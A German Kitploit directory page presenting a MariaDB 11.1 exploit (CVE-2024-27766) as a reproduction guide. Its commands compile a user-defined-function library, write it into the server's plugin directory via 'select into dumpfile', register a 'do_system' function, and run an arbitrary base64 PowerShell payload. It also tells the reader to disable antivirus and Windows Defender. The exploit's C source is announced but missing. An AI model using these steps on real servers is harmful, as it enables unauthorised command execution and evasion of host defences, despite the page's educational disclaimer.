Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mysql_CVE-2024-27766 — Datenbank-authentifizierte Codeausführung | Kitploit
Tools/GitHubGitHub/hissec/mysql_cve-2024-27766
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungPayload-EntwicklungDatenbanksicherheit
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Datenbank-authentifizierte Codeausführung

Repository anzeigen
13vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Leitfaden zur Reproduktion des Exploits (betroffene Produktversion MariaDB 11.1)

Dieser Leitfaden enthält Schritt-für-Schritt-Anweisungen zur Reproduktion eines Angriffs mithilfe einer benutzerdefinierten Funktion (User-Defined Function, UDF) auf ein Datenbanksystem. Bitte beachten Sie, dass dieser Exploit auf einigen Systemen funktioniert, auf 64-Bit-Architekturen oder bestimmten Builds jedoch möglicherweise nicht korrekt funktioniert.

Warnung: Dies dient ausschließlich Bildungszwecken. Die unbefugte Verwendung dieser Techniken ist illegal und unethisch.

Schritte zur Reproduktion des Angriffs

1. UDF-Code herunterladen und vorbereiten

Erstellen Sie zunächst eine Datei mit dem Namen exploit.c und fügen Sie den folgenden Code hinzu:

root@kitploit:~

### 2. Compile the UDF Code

Kompilieren Sie den Exploit-Code mit dem Compiler x86_64-w64-mingw32-gcc:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -c exploit.c

3. Eine Shared-Object-Datei erstellen

Tool herunterladen

Erzeugen Sie aus der kompilierten Objektdatei eine Shared-Object-Datei (exploit.so):

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. Die Shared-Object-Datei in Hexadezimal umwandeln

Verwenden Sie xxd, um die .so-Datei in ein hexadezimales Format zu konvertieren:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. Den Hexadezimalwert in die Datenbank laden

Kopieren Sie den Hexadezimalwert aus hex_value.txt und führen Sie den folgenden Befehl in Ihrer Datenbank aus:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. Plugin-Verzeichnis ermitteln und Exploit bereitstellen

Ermitteln Sie das Plugin-Verzeichnis, indem Sie Folgendes ausführen:

root@kitploit:~
DB> select @@plugin_dir;

Erstellen Sie anschließend die Exploit-Shared-Object-Datei im Plugin-Verzeichnis:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

Hinweis: Passen Sie den Pfad entsprechend der Konfiguration Ihres Systems oder dem jeweiligen Plugin-Verzeichnis an.

7. Die schädliche Funktion erstellen

Erstellen Sie mithilfe des Exploits eine neue Funktion in der Datenbank:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. Den Exploit ausführen

Deaktivieren Sie jegliche Antivirensoftware oder Windows Defender, die den Exploit blockieren könnte. Führen Sie dann einen Befehl mithilfe der neu erstellten Funktion aus:

root@kitploit:~
DB> select do_system('powershell base64 here');

Ersetzen Sie 'powershell base64 here' durch die Base64-codierte Nutzlast des Befehls, den Sie ausführen möchten.


Haftungsausschluss: Dieses Dokument dient ausschließlich Bildungszwecken und der Sicherheitsforschung. Der Missbrauch dieser Informationen kann zu strafrechtlicher Verfolgung und schwerwiegenden rechtlichen Konsequenzen führen. Holen Sie stets die Genehmigung der zuständigen Behörden ein, bevor Sie Schwachstellen in einem Netzwerk oder System testen.